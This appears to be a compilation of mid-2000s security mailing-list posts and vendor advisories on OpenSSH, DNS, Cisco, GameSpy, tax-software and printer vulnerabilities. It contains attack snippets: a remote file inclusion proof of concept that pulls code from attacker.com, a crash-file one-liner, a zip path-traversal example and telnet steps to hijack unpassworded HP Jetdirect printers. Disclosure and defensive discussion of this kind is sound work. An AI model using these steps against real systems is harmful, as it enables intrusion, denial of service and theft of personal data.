allowing an attacker to focus password guessing attacks on user IDs with 
which it would have a chance of gaining access. For those folks out 
there who are more familiar with OpenSSH than I am: How hard would it be 
to make the responses indistinguishable?


This has been a known issue for some time (Google), so I guess it's 
about time someone started using it rather than the usual "a, aa, aaa, 
aba, abb, ... z" type attacks I usually see.  Those always make 
me laugh.


While I agree with your point, I'm not versed enough in the SSH protocol 
(and don't feel like Googling again myself) to know if there's a 
technical reason (timing, etc.) that this behavior exhibits itself. 
This should raise an interesting discussion.


FWIW, I found that this sort of enumeration was possible myself when 
researching 2-factor authentication with OpenSSH.


That being said, I'd suggest configuring 2-factor authentication for any 
truly critical SSH gateways into your network.  If you don't want to 
dole out the cash for key fobs (including the cash to purchase them 
again and again as employees break them with really creative excuses ;), 
you can use public keys as "something employees have" along with the 
usual password for "something employees know".  With two-factor enabled, 
having either the key (stolen laptop) or the password (successful 
dictionary attack) won't permit access and will log the attempt.


http://bugzilla.mindrot.org/show_bug.cgi?id=983

Have been using this patch against the latest OpenSSH-stable release for 
awhile now along with appropriate log watchers, and getting a bit more 
sleep at night.


--Mike

Re: recursive DNS servers DDoS as a growing DDoS problem

[mike davis]

If you have a 20,000 bot botnet and each bot has 2 defined recursive dns
servers that it is allowed to use and these bots are on the local subnet 
(ie

BCP38 is implimented at the gateway but not at every router) then how
exactly is locking down recursive servers so you can only use yours going 
to

solve anything?


uh... caching maybe?... the second field of your answer section when using 
dig..



To fix DNS we would have to eliminate it's use of UDP which means pretty
much all internet software would need to be rewritten, that is an
unrealistic goal.


no, its not, and it doesnt require that all internet sofware be rewritten, 
it means that they either need to be
recompiled, or just have the dynamicly linked library they use for dns 
resolution to be replaced..



 Locking down recursive servers may increase the number of
machines required to create a flood but again a large botnet will have no
problem so that's no solution either. BCP38 will accomplish the same
ineffective goal but at least has the added potential to reduce non DNS
related spoofed attacks at the same time making it easier to at least 
track

down the sources of a distributed flood at least to the provider level if
not to the exact IP.


i think its pretty obvious that locking down dns servers at least brings the 
DNS attacks down to the same problem weve always had..
that being good old fashioned udp packeting. and at that point.. why bother 
using dns..


-phar 

Re: Evil side of Firefox extensions

[Mike Owen]

On 3/1/06, azurIt <[EMAIL PROTECTED]> wrote:
> the internet. The worst of all is that _anyone_, who has physical access to
> your computer, can install extensions into your browser _without_ your
> notification.

Not on a multi-user system. For example, on this Linux workstation, I
can install extensions for myself, but other users can't use them
because they are installed into my ~/.mozilla/firefox/blah/extensions
directory. If they are installed by root, then everyone can use them
because they are installed into /opt/firefox/extensions. If you give
everyone full access to your workstation, you deserve the
consequences.

Mike

gnome evolution mail client inline text file DoS issue

[Mike Davis]

i admit, i posted this bug just a short while ago, but since its an
anoyance more then a vuln.. i dont really care.. be glad i didnt demo it
here :) (for evolution users anyway)

so the issue is with text based file attachments with the
"Content-Disposition" set to  "inline".. if this text file contains a
single line of excessive length.. evolution dies.. even worse, ive had
this take down my X server during testing but i cant reproduce it
reliably. but im sure someone else will.

another unfortunate feature of evoltion is that it will reopen to the
message that crashed it when restarting after the crash.. pretty much
making evolution unusable untill you clean the damn message out of your
inbox (not to mention your local cache)... oh and dont think your faster
by trying to click another message while evoltion loads.. this seems to
increase the odds of killing your X server..

so, to try this out yourself, first create an email attachment that
evolution doesnt mind displaying inline..

perl -e 'printf "A"x4' > evolution-dos-poc.xml

attach the file, suggest inline display of the xml file, and send to an
unfortunate bastard^H^H^H^H^H^H^H friend who happens to run evolution..

im not sure how to work around this in the short run, sorry guys.
it might almost be worth having an option to disable the auto display of
inlined files..

enjoy
-phar

Re: WMF vulnerability was a deliberate backdoor?

[Mike Ely]

Brooks, Shane wrote:

I've recently had my attention brought to a post from Steve Gibson in the 
grc.com forums, which contains the following quote:


	The only conclusion that can reasonably be drawn is that this [setAbortProc procedure] 
was a deliberate backdoor put into all of Microsoft's recent editions of Windows.



full article here:
http://www.grc.com/x/news.exe?cmd=article&group=grc.news.feedback&item=60006

thoughts?



Shane,

What you read was classic Gibson: a thorough discussion of a technical 
problem, followed by a wild speculative jump regarding the motives of 
the people who wrote the code.  He's been doing this for years, which is 
why you may notice folks here take a very jaded view of anything he says 
- ever.


In the specific case of his commentary on the WMV vulnerability, I have 
read the same writeup you have read, and what my read on it was that he 
was saying something like the following:
	"There's an unhandled exception that doesn't even need to be there in 
the first place, therefore it's a deliberate backdoor."
To me, this just screams "Does Not Follow!"  I've seen plenty of equally 
stupid mistakes coming from Redmond (and elsewhere) that didn't happen 
to result in remote code execution, but were nonetheless astonishingly 
dumb.  For example, up until a couple days ago, you could make the error 
handler at ideas.live.com write all sorts of amusing stuff to their 404 
page simply by appending it to the URL.  Was it a security risk? 
Possibly, probably not.  Was it really dumb?  Duh.


So my take on Gibson's post can be summed up as follows: Interesting 
writeup on the problem, but he's come nowhere close to proving to me 
that the WMF vulnerability was deliberate.  If he wanted to show me the 
sourcecode where it has a comment like "/* The following code is here at 
the behest of No Such Agency.  Do not remove from future versions. */" I 
might start to consider the possibility of some dark conspiricy.  As it 
stands, it just looks to me like Yet Another Dumb Screwup by Microsoft 
(YADSM).


Cheers,
Mike Ely

Re: Countering Trusting Trust through Diverse Double-Compiling

[Mike Lisanke]

David,

I haven't read the original attack description recently, but; I seam
to remember that the ability of the tampered compiler to inject
malicious code could be stateful. Either a timing attack, or a attack
after n-builds, so that malicious code is injected in an arbitrary,
pseudo-random, less detectable way. Also, that this code would be
injected based on compiler state conditions (like after keywords
indicated that the code may be network based). I haven't read your
paper, yet; but; I'd be interested know where you'd plan to discuss
scenarios where your counter attack would fail. Thank you.

Best regards,
--
Mike

Re: - Cisco IOS HTTP Server code injection/execution vulnerability-

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

> [EMAIL PROTECTED] <[EMAIL PROTECTED]> [2005-11-28 16:01] wrote:
> It has been identified a vulnerability in the Cisco IOS Web Server. An 
> attacker can inject
> arbitrary code in some of the dynamically generated web pages. To succesfully 
> exploit the vulnerability the attacker only needs to know the IP of the 
> Cisco. THERE'S NO NEED TO HAVE ACCESS TO THE WEB SERVER! Once the code has 
> been inyected, attacker must wait until the admin browses some of the 
> affected web pages.
> 
> Full advisory and P.o.C. exploit that changes the "enable" password at:
> 
> http://www.infohacking.com
> [- End of Included Message -]


Cisco has released an advisory regarding this issue.  For workarounds, 
fixes and more information regarding this vulnerability, please refer to:

http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml

- -Mike-

- -- 
- ------
|  ||||   | Mike Caudill  <[EMAIL PROTECTED]>   |
|  ||||   | PSIRT Incident Manager   |
|     | DSS PGP: 0xEBBD5271  |
| ..:||:..:||:..  | +1.919.392.2855 / +1.919.522.4931 (cell) |
| C i s c o S y s t e m s | http://www.cisco.com/go/psirt|
- --

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (GNU/Linux)

iD8DBQFDkHgiimPJSeu9UnERAsy3AJ4wWIN5oBE1N82sCoH6xwGZmAB35QCglP8F
0B6VqtHOUQA8s9PYSmz2qVg=
=aoxd
-END PGP SIGNATURE-

Re: Cisco CSS 11000 Series DoS

[Mike Caudill]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1



This is to acknowledge your postings regarding a Denial of Service 
vulnerability in the Cisco CSS 11000 platforms located at:

Vulnwatch list:
http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0073.html

BUGTRAQ:
http://www.securityfocus.com/archive/1/332284/2003-08-05/2003-08-11/0

The Cisco PSIRT is investigating the issue further.  Once we have verified 
details surrounding this problem, we will post a response to both forums 
with more information regarding fixed software versions and applicable 
workarounds which can be used to mitigate the problem.

Thanks.

- -Mike-


> ###
> ID: S21SEC-025-en
> Title: Cisco CSS 11000 Series DoS
> Date: 04/07/2003
> Status: Solution available
> Scope: Interruption of service, high CPU load.
> Platforms: All/Chassis CS800.
> Author: ecruz, egarcia, jandre
> Location: http://www.s21sec.com/en/avisos/s21sec-025-en.txt
> Release: External
> ###
>
>   S 2 1 S E C
>
>  http://www.s21sec.com
>
>Cisco CSS 11000 Series Denial of service
>
> Description of vulnerability
> 
>
> A heavy storm of TCP SYN packets directed to the circuit address of the 
> CSS 
> can cause DoS on it, high cpu load or even sudden reboots.
>
> The issue is known by cisco as the ONDM Ping failure (CSCdz00787). On the 
> CS800 chassis the
> system controller module (SCM) sends ONDM (online diagnostics monitor) 
> pings to each SFP card
> in order to see if they are alive, if the SCM doesn't get a response in 
> about 30 seconds the
> SCM will reboot the CS800 and there will be no core.
>
> By attacking the circuit IP address of the CSS with SYN packets the 
> traffic is sent up to the SCM
> over the internal MADLAN ethernet interface. If this internal interface 
> becomes overloaded
> the ONDM ping request and response traffic can be dropped leading this to 
> an internal DoS
> since no internal comunications are available.
>
> Any attacker could do this externally with a few sessions of NMAP and a 
> cable/ADSL internet
> connection.
>
> Affected Versions and platforms
> ---
>
> This vulnerability affects the models 11800, 11150 and 11050 with chassis 
> CS800.
>
> Solution
> 
>
> Upgrade to software release WebNS 5.00.110s or above.
> http://www.cisco.com/en/US/products/hw/contnetw/ps789/prod_release_note0918
> 6a008014ee04.html
>
> AcL's to protect the circuit address are recomended.
>
> Additional information
> --
>
> These vulnerabilities have been found and researched by:
>
>  Eduardo Cruz[EMAIL PROTECTED]
>  Emilin Garcia [EMAIL PROTECTED]
>  Jordi Andre[EMAIL PROTECTED]
>
> You can find the last version of this warning in:
>
> http://www.s21sec.com/en/avisos/s21sec-025-en.txt
>
> And other S21SEC warnings in http://www.s21sec.com/en/avisos/

- -- 
- 
|  ||||   | Mike Caudill  | [EMAIL PROTECTED] |
|  ||||   | PSIRT Incident Manager| 919.392.2855   |
|     | DSS PGP: 0xEBBD5271   | 919.522.4931 (cell)|
| ..:||:..:||:..  | RSA PGP: 0xF482F607   -|
| C i s c o S y s t e m s | http://www.cisco.com/go/psirt  |
- 

-BEGIN PGP SIGNATURE-
Version: PGP 6.5.2

iQA/AwUBPzPjG4pjyUnrvVJxEQJNOwCfR7b6rjXNpcAmbgXue5pk6t6+PDEAoO4n
vZpl/lFWudgREMq98AwDGbFq
=DY/N
-END PGP SIGNATURE-

GameSpy Arcade Arbitrary File Writing Vulnerability

[Mike Kristovich]

###
ThreeZee Technology, Inc.   Security Advisory#TZT002
###

Advisory:GameSpy Arcade Arbitrary File Writing

Discovered:  July 26, 2003
Released:July 31, 2003

Risk:Critical; Allows writing of a file to any
 location on the victim's system.

Author:  Mike Kristovich, Security Researcher
 ThreeZee Technology, Inc. 
 http://www.ThreeZee.com

### 

Table of contents:

1)Introduction
2)The Bug
3)Details
4)Fix
5)Philosophy
6)Closing comments

___

1) Introduction
 
The problem exists within GSAPAK.EXE, a game update agent which 
is included by default with the installation of GameSpy Arcade. 

GameSpy automatically adds three mime types to the list of 
accepted documents in Internet Explorer and Netscape Navigator,
which are:

"application/x-gsarcade-usersvc"
"application/x-gsarcade-skinpak"
"application/x-gsarcade-launch" 

By default, when a file with the extension of .APK, .arcade or 
.asn is received, it will be launched by GSAPAK.exe.

___

2) The Bug

When a user receives a file with the .APK extension, it is
actually a simple ZIP file.  An attacker could simply construct
a ZIP file, and change the path so that it would by extracted 
into the root directory of the drive, or even the startup 
directory of Windows.

Using this method, it would be quite easy to insert a virus,
trojan horse, or pretty much anything one desires, into the
victim's system.

i.e.:   ../../../calc.exe - Would put it in the root directory

Because the file is considered an accepted type by browsers, 
there will be no dialog asking the user to accept or deny
receiving it. 

___

3) Risk

If a user were to have JavaScript enabled, the attacker could 
even add "onLoad=" to an IMG tag on a web page, which would run
the file upon the image being loaded.  This could have serious
consequences on Gaming Forums.

This bug does not require GameSpy Arcade to run, or ever have
run.  It's possible that it has been installed along with a 
game, and hasn't been touched.  This does not make the user 
safe.  GSAPAK.exe is a separate entity in the GameSpy package,
and is useful for the purpose they've created it.

___

4) Fix
  
GameSpy was notified on July 28, 2003.

GameSpy responded very quickly, and they were on their way to
fixing the bug within 12 hours of the initial contact.

Directory of GameSpy Technology, David Wright, has told TZT
that this vulnerability will be fixed in a patch this week.
We'd like to thank GameSpy for their extremely fast response
and professionalism in handling this matter.

Current GameSpy Arcade users should see the patch, and be 
given the option (possibly required) to update.  We suggest
the latter.

If you have concerns about waiting for the patch, it can be 
temporarily fixed by removing the above specified accepted 
documents from the registry. You could also remove GSAPAK.exe,
or you could even choose to uninstall GameSpy Arcade until the
patch becomes available later this week.

___


5) Philosophy

GameSpy has hundreds of thousands of users, most of which are 
using GameSpy Arcade and are vulnerable to this bug.
  
This bug has now been disclosed, and all users should patch
their system as soon as the patch is available.
  
Keep in mind, your system will still be vulnerable even if 
you've installed GameSpy Arcade, but never ran it.

___ 

6) Closing comments
  
We would like to thank GameSpy and David Wright for their
prompt handling of the bug report, again.   

___

7) Contact

 Questions, comments, complaints:
 
  Mike Kristovich, Security Researcher
  ThreeZee Technology, Inc.

  http://www.ThreeZee.com
  [EMAIL PROTECTED]


 Press inquiries:

  [EMAIL PROTECTED]

 

Tomcat Dangerous Documentation/Tomcat Default Plaintext Password Storage

[Mike Bommarito]

>From the Realm HOW-TO on the Tomcat 4.0/4.1 documentation pages:

"For each of the standard Realm implementations, the user's password (by 
default) is stored in clear text. In many environments, this is 
undesireable because casual observers of the authentication data can 
collect enough information to log on successfully, and impersonate other 
users. To avoid this problem, the standard implementations support the 
concept of digesting user passwords. "

Following, near a paragraph down.

"When a standard realm authenticates by retrieving the stored password and 
comparing it with the value presented by the user, you can select digested 
passwords by specifying the digest attribute on your  element. The 
value for this attribute must be one of the digest algorithms supported by 
the java.security.MessageDigest class (SHA, MD2, or MD5)."

First of all, if SHA, MD2, and MD5 are all supported (since 4.x, as the 
Realm documentation would lead me to believe), and it's only a matter of 
adding an attribute to the server.xml file, what is stopping them from 
enabling this by default?  The problem is made even worse for the 4.x 
family by the fact that the install documentation seems yet to be mature, 
as this rather simple fix is buried in a rather confusingly titled 
document "Realm HOW-TO," and no reference is to be found in any of 
the "Getting Started" documents.  As far as I can tell, with limited 
experience in both the 3.x and 5.x branches, although it's more an issue 
of user neglegience for the well-documented 5.x branch, the 4.x 
documentation is dangerously ignorant of this issue.  While proper file 
system permissions easily prevent unencrypted authentication storage issue 
from causing real trouble, there are always breaks and loops in any file 
system or permission set, so when that happens, why give this information 
away for free?

OpenSSH remote clent address restriction circumvention

[Mike Harding]

Welkyn Security Advisory SA-2003060400

Synopsis: SSH "from=" and "[EMAIL PROTECTED]" restrictions spoofable via
reverse DNS for numerically specified IP addresses.

Issue Date: June 4, 2003

Software Affected:  OpenSSH 3.6.1 and earlier

Vendor notified: May 24, 2003.

Vendor response:  See workarounds, below.

Severity: Low/Medium (unauthorized remote access)

Description:

OpenSSH provides a number of mechanisms to restrict client remote
logons to a server.  An individual user may use "From="
in their $HOME/.ssh/authorized_keys file, the sshd_config file can use
'@' to restrict certain users to logging in
from certain hosts.  The hostpatterns are similar to Unix glob file
matching, with ? and * acting as wildcards.  Either an IP address or a
host name may be specified in the pattern.

When a host name is specified, a reverse lookup is done on the IP
address of the client host.  Trivially, this is spoofable when the
attacker controls his own reverse DNS.  The sshd_config file for the
server does provide a VeriftyReverseMapping flag (which defaults to
'no') that will cause a reverse DNS lookup to be followed by a forward
DNS lookup and the two mappings will be required to match, preventing
trivial spoofing.

Interestingly, when a purely numeric IP address is provided, an
attacker who controls reverse DNS for his host can circumvent this
controls by returning text containing a numeric IP address in the
reverse DNS response.  This would allow stolen keys containing numeric
IP address restrictions to be used from other IP address, or external
access to a system which had

AllowUsers [EMAIL PROTECTED] 

set in an attempt to limit access to users in the internal 192.168/16
network.

The exploit works because the code treats both the IP address and
hostname as strings, and there is no logic to indicate when a pure IP
address match should be attempted.

This exploit does not provide direct access to server, but may allow
access from disallowed hosts.  An example could be a former employee
who has a password or private key but no longer has access to the
network from inside the company, or an external hacker who is guessing
passwords.

The commercial F-Secure SSH-1 and SSH2 products do not appear to have
this problem - they must have been fixed after the OpenSSH code fork.

Workarounds:

Enable 'VerifyReverseMapping' on the sshd server - this may, however,
lead to slow logins when the client doesn't have a reverse DNS server.
This is the vendor recommended workaround.  Future versions of OpenSSH
should address this vulnerability, either by documentation or code
changes.

Consider using tcp-wrappers to restrict access by IP address.

Consider using a packet filter or firewall in addition to the OpenSSH
restrictions.

Contact:

This vulnerabilty was discovered by Michael V. Harding
([EMAIL PROTECTED]) during a code inspection and verified with a DNS
server.

Re: b2 cafelog 0.6.1 remote command execution.

[mike little]

pokleyzz wrote:
Products: b2 cafelog 0.6.1 (http://cafelog.com/)
Date: 29 May 2003
Author: pokleyzz 
Contributors: sk_at_scan-associates.net
   shaharil_at_scan-associates.net
   munir_at_scan-associates.net
URL: http://www.scan-associates.net
Summary:  b2 cafelog 0.6.1 remote command execution.

Description
===
b2 cafelog is blogger system written in php with mysql ad database backend.
Details
===
b2 cafelog 0.6.1 come with directory b2-tools.  This directory contain 2 
php scripts
(blogger-2-b2.php and gm-2-b2.php) which allow user to specify $b2inc 
and do
remote code injection.

from blogger-2-b2.php line 21 
-
case "step1":

   include("b2config.php");
   include("$b2inc/b2functions.php");
   include("$b2inc/b2vars.php");
 

from gm-2-b2.php line 5 
--
// 3. load in the browser from there

include("b2config.php");
include($b2inc."/b2functions.php");
--- 

Proof of concept
===
http://blabla.com/b2-tools/gm-2-b2.php?b2inc=http://attacker.com
attacker.com have file named b2functions.php with php script you want to
execute.
Workaround
=
Remove b2-tools directory.
Vendor Response
===
Vendor has been contacted on 19/05/2003 but to reply given.

Firstly, the issue has been addressed 
http://tidakada.com/board/viewtopic.php?t=3212
and a new version issued
http://tidakada.com/board/viewtopic.php?t=3234

Secondly, has anyone tried this? The fact is that b2config.php defines 
$b2inc with no test before hand. So that, whilst for the duration of the 
parsing of b2config.php, $b2inc could indeed be set to some value from 
the outside world. It is immediately overwritten with no check with the 
value set by the user (or left from the defalut installation).
In order to effectively use the setting of b2inc for malicious purposes 
you would have to have enough access to edit b2config.php.

Mike

PivX Advisory MK002B H&R Block TaxCut Information Disclosure Vulnerability

[Mike Kristovich]

Mike Kristovich, PivX Security Advisory MK#002B

Date:January 10, 2003

Application: H&R Block Tax Cut
Version: All versions up to current.
Bug: Information in saved Tax Returns discloses Social Security
 Number, Full Information, and more..
Risk:Can allow for identity theft, information disclosure
Author:  Mike Kristovich, Security Researcher, PivX Solutions, LLC
 e-mail: [EMAIL PROTECTED]



Sections:

1) Introduction
2) Bug
3) Proof of concept code.
4) Fix
5) Philosophy
6) Closing comments..
7) Contact

__


1) Introduction

According to the Jupiter report, 31 percent of online 
households intend to file their taxes over the Web this 
year, up from the 30 percent reported by the Internal 
Revenue Service (IRS) last year. The IRS plans to receive 
80 percent of all returns electronically by 2007. 

Complaints about identity theft have risen 73 percent from 
a year ago, according to a new report from the Federal Trade 
Commission. 

With the influx of e-tax filers and the rise in identity
theft PivX believes this vulnerability should be taken
quite seriously. Someone with a minimal set of computer skills
could locally or remotely obtain confidential information
on  multitude of users.


TurboTax (Advisory #MK002A) and TaxCut (#MK002B) both
save their contents to the hard drive.  These files are
unencrypted, and even with a simple text editor, you can
see all the information you would in the tax return.

These files can be accessed in any number of ways, but the
most likely way would be through unprotected windows shares.

Another key method to extract these files by means of a P2P
file sharing application such as Limewire, KaZaa, Morpheus,
etc etc. Many users have their P2P applications misconfigured
and this is supported by doing a quick search on the tax file
extension listed below. See the below KaZaa screenshot of a 
local-range search for tax files. A full network search could 
yeild thousands upon thousands of results.:
http://www.pivx.com/kristovich/images/kazaatax.jpg

The bottom line is:
- Be aware of what you are sharing to the public -

There are other ways files could be collected, such as
through a worm, an exploit, or a trojan horse.


H&R Block Tax Cut files are named with this extension:

".sbr" .. Decently small files < 8k usually.

and are usually located in a directory off the root of
the drive, such as "TaxCut02", under the subdirectory
"Program\TaxData"

A "hacked" H&R block computer could give an identity theft
hundreds of plaintext files full of information.

Example Screenshot: 
[http://www.pivx.com/kristovich/images/taxcut.gif]

__


2) Bug

Just a small insecurity can lead to a lot of information. 

Tax Cut is pretty simple to view.  Just load the file into
a text editor and you've got it all. Social Security #,
dependants SS#s, address, wages, etc.

Example Screenshot: 
[http://www.pivx.com/kristovich/images/sbrfile.jpg]

__


3) Proof-of-concept code

No proof of concept needed, just use a hex editor or text
editor as files are associated:

(.sbr) Text Editor


__


4) Fix

* No response has yet been recieved from H&R Block. (1/10/2003)
* Second contact email sent on 1/29/2003.
* No response as of 3/04/2003.

 The best solution is to move saved tax files to a more private place,
 such as a CD-R.  Even if a drive is not shared to the public, you may
 still be at risk through other exploits or trojan horses.

 As mentioned by Becky Worley in a TechTV article tuesday, 
 [http://www.techtv.com/news/security/story/0,24195,3420432,00.html]
 Easy Crypto Deluxe is recommended to password protect your 
 sensitive data. You can download it here: 
 http://www.handybits.com/easycrypto.htm

Hopefully the company will create a fix for this problem.

__



5) Philosophy

Full disclosure can lead to a quick fix, and prevent a problem before
it gets into the wrong hands.  


__


6) Closing comments..

In the electronic world, consider nothing secure.  You should never
store this type of information on a live computer. Be careful.
 
__

7) Contact
  
  Any questions, comments, complaints, technical questions:

  Mike Kristovich, Researcher
  PivX Solutions, LLC
  [EMAIL PROTECTED]

  Other Inquiries:
  
  Geoff Shively, CHO
  PivX Solutions, LLC
  [EMAIL PROTECTED] 

__

PivX Advisory MK002A Intuit TurboTax Information Disclosure Vulnerability

[Mike Kristovich]

Mike Kristovich, PivX Security Advisory MK#002A

Date:January 10, 2003

Application: Intuit TurboTax
Version: All versions up to current.
Bug: Information in saved Tax Returns discloses Social Security
 Number, Full Information, and more..
Risk:Can allow for identity theft, information disclosure
Author:  Mike Kristovich, Security Researcher, PivX Solutions, LLC
 e-mail: [EMAIL PROTECTED]



Sections:

1) Introduction
2) Bug
3) Proof of concept code.
4) Fix
5) Philosophy
6) Closing comments..
7) Contact

__


1) Introduction

According to the Jupiter report, 31 percent of online 
households intend to file their taxes over the Web this 
year, up from the 30 percent reported by the Internal 
Revenue Service (IRS) last year. The IRS plans to receive 
80 percent of all returns electronically by 2007. 

Complaints about identity theft have risen 73 percent from 
a year ago, according to a new report from the Federal Trade 
Commission. 

With the influx of e-tax filers and the rise in identity
theft PivX believes this vulnerability should be taken
quite seriously. Someone with a minimal set of computer skills
could locally or remotely obtain confidential information
on  multitude of users.


TurboTax (Advisory #MK002A) and TaxCut (#MK002B) both
save their contents to the hard drive.  These files are
unencrypted, and even with a simple text editor, you can
see all the information you would in the tax return.

These files can be accessed in any number of ways, but the
most likely way would be through unprotected windows shares.

Many ISPs have blocked port 139 among others, but in newer
versions of Windows, you may also be sharing on port 445.
Port 445 is Microsoft Directory Service.  A large number 
of tax files and the identities within can be harvested
in a matter of minutes to hours.  

Another key method to extract these files by means of a P2P
file sharing application such as Limewire, KaZaa, Morpheus,
etc etc. Many users have their P2P applications misconfigured
and this is supported by doing a quick search on the tax file
extension listed below. See the below KaZaa screenshot of a 
local-range search for tax files. A full network search could 
yeild thousands upon thousands of results.:
http://www.pivx.com/kristovich/images/kazaatax.jpg

The bottom line is:
- Be aware of what you are sharing to the public -

There are other ways files could be collected, such as
through a worm, an exploit, or a trojan horse.

Intuit TurboTax files (.tax) are usually named this way:

"   Tax Return.tax"

and the files are usually located off the root of the drive,
in a directory such as "Tax02" "Tax01" "Tax99", etc.

__


2) Bug

Just a small insecurity can lead to a lot of information. 

For TurboTax, you can do a simple scan for the 
last name of the person, and closely following it, you'll
see their social security number.  Browse around that area
of the file and you'll see their street address and more.
If you use turbotax, load up one of your files in a binary
editor and check it out for yourself.

__


3) Proof-of-concept code

No proof of concept needed, just use a hex editor or text
editor as files are associated:

(.tax) Hex Editor

View Example Screenshot: 
http://www.pivx.com/kristovich/images/taxfile.jpg


__


4) Fix
 
 Intuit has been contacted and is currently working on a solution.

 They have informed us that they will now be encrypting files starting
 in the next version. 

 The best solution is to move saved tax files to a more private place,
 such as a CD-R.  Even if a drive is not shared to the public, you may
 still be at risk through other exploits or trojan horses.

 As mentioned by Becky Worley in a TechTV article tuesday,  
 [http://www.techtv.com/news/security/story/0,24195,3420432,00.html]
 Easy Crypto Deluxe is recommended to password protect your 
 sensitive data. You can download it here: 
 http://www.handybits.com/easycrypto.htm

 We thank Intuit for the extremely fast response on this one,
 keep up the good work! 

__



5) Philosophy

Full disclosure can lead to a quick fix, and prevent a problem before
it gets into the wrong hands.  


__



6) Closing comments..

In the electronic world, consider nothing secure.  You should never
store this type of information on a live computer. Be careful.
 

Re: [Summary of Responses] Bound by Tradition: A sampling of the security posture of the Internet's DNS servers

[Mike Bell]

On Tue, Mar 11, 2003 at 08:30:17AM -0800, Mike Schiffman wrote:
> 12) It is a bit misleading to say djbdns has no security 
> vulnerabilities.  While it is true that the component programs that 
> make up djbdns have not had a known vulnerability, the design of djbdns 
> relies on external services (Bernstein recommends rsync over ssh, I 
> believe) to replicate data from the primary to secondaries.

By that logic a bug in vi is a bug in BIND, because you need an editor
to maintain zone files.

DJB may recommend rsync over ssh, but djbdns as distributed by DJB only
offers that as one potential way to get data from one computer to another,
you can use any means you see fit to do so.

[Summary of Responses] Bound by Tradition: A sampling of the security posture of the Internet's DNS servers

[Mike Schiffman]

 up those assertions:
* "Poor programming is obviously the main issue enabling the 
vulnerabilities" -- you provide no data that demonstrates poor 
programming.  An assertion along the lines of "attempts to integrate 
code from a wide variety of sources in the traditional open source 
fashion is the main issue enabling the vulnerabilities" would probably 
be more accurate.
* "BIND ... is a perfect example of what happens when security is 
retrofit as opposed to designed into the product ..." -- you have not 
documented a basis that there was an attempt to retrofit security into 
the product.

9) Bill Manning at ISI runs a periodic survey of BIND versions and has 
been doing so since 1996 or so.  Stating your report "is the first to 
present substantive proof quantifying just how vulnerable" the DNS 
infrastructure is ... a bit of a stretch.

10) You mention the root DDoS attacks but they are unrelated to BIND.  
The attacks didn't even use DNS packets.

11) BIND version 4 continues to get security patches.  It is currently 
at version 4.9.11 (last I looked).

12) It is a bit misleading to say djbdns has no security 
vulnerabilities.  While it is true that the component programs that 
make up djbdns have not had a known vulnerability, the design of djbdns 
relies on external services (Bernstein recommends rsync over ssh, I 
believe) to replicate data from the primary to secondaries.  A 
vulnerability in these external services, mandatory for (the equivalent 
of) normal zone maintenance data replication with djbdns, would be at 
least as damaging as a vulnerability in the djbdns package itself.  
However, it makes it much easier to offer 'security guarantees' since 
large chunks of functionality are not covered under the warranty (so to 
speak).  There have been vulnerabilities in ssh since djbdns was 
released.

13) Stating "BIND is mature" is misleading as BINDv9 was a complete, 
from the ground up rewrite of BIND sharing no code (except for an 
optionally compile backwards compatibility stub resolver library that 
does not link into the server) with BINDv8.  BINDv4 could be called 
mature.  BINDv8 is arguable.  The large jump in lines of code for 8.2 
was a result of integration of code from external parties (Intel, 
Checkpoint, and NAI to name three).  Clearly, given the number of lines 
of code doubled, the maturity of the code base was reset."

--
Mike Schiffman, CISSP
http://www.packetfactory.net/schiffman.html 

[New Research Paper] Bound by Tradition: A sampling of the security posture of the Internet's DNS servers

[Mike Schiffman]

Hello. I just put the finishing touches on a whitepaper detailing the
security posture of the Internet's DNS infrastructure. To wit:

"DNS servers across the Internet running BIND are not up to date with
security patches and software updates. As a result, a significant
fraction of the Internet's DNS servers is vulnerable to compromise,
subversion, denial of service, and general misuse. Considering that DNS
is the lynchpin of the corporate enterprise, the impact of these
vulnerabilities is significant and a successful attack could bring down
any online business."

http://www.packetfactory.net/DNS/

Comments are welcomed; off-list is preferable and I will post a summary.

Thanks.

--
Mike Schiffman, CISSP
http://www.packetfactory.net/schiffman.html 

Re: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin

[Mike Kristovich]

Sven,

Unfortunately, if you do a scan of a few subnets, you're bound to find
quite a bit of open, unpassworded Jetdirect hosts.  If you just scan for
port 23 and/or port 80, these Jetdirects pop up everywhere.  Most of them
will not have a password set on them.   You have this defined as #3 on your
"additional protection" list.  It makes a very good point that most
administrations don't tend to pay attention to.  This is a known issue, but
it still exists worldwide.  The information provided will hopefully remind a
good number of people to go ahead and set the password now, before somebody
else does.

As you will see in the examples below, you can compromise an HP
Jetdirect via telnet quite easily.  If the password is disabled (as it is on
most), you'll have instant administrative access.  A similar interface can
be found on port 80 (WWW), but is java-driven almost entirely.  Take a look
at the examples below to see how easily you can compromise via telnet.

 Telnetting to port 23 will give you the following:
---

HP JetDirect

Please type "?" for HELP, or "/" for current settings
>

---

Typing "/" will give you the following:

   ===JetDirect Telnet Configuration===
Firmware Rev.   : G.08.40
MAC Address : 00:X0:X0:cX:7X:Xf
Config By   : USER SPECIFIED

IP Address  : X.X.X.X
Subnet Mask : 255.255.255.0
Default Gateway : X.X.X.X
Syslog Server   : Not Specified
Idle Timeout: 120 Seconds
Set Cmnty Name  : Not Specified
Host Name   : Not Specified

DHCP Config : Disabled
---> Passwd  : Disabled
IPX/SPX : Enabled
DLC/LLC : Disabled
Ethertalk   : Disabled
Banner page : Enabled

-

If you type "?" for help, you'll notice this line at the end.

Type passwd to change the password.

Type "passwd", and..

Enter Password[16 character max.; 0 to disable]: >

You now have complete control of the device, while locking out the "real"
administrator.

--

> Additional means of protection (does not address the SNMP vulnerability):
> 3. Define a telnet password (do not keep it empty)

#3 on the list you provided is extremely important.  Remember to set a
password, or you're leaving the device open for public administration!

Thanks,

Mike Kristovich, Security Researcher
PivX Solutions, LLC
http://www.PivX.com


- Original Message -
From: "Sven Pechler" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Monday, March 03, 2003 10:25 AM
Subject: New HP Jetdirect SNMP password vulnerability when using Web
JetAdmin


>
>
> Hello,
>
> During an analysis of some HP Jetdirect cards I discovered a security
> issue that could lead to full access to a networked printer.
>
> It looks like the vulnerability described in
> http://www.securityfocus.com/bid/5331, but the OID is different and you
> can only obtain one specific password.
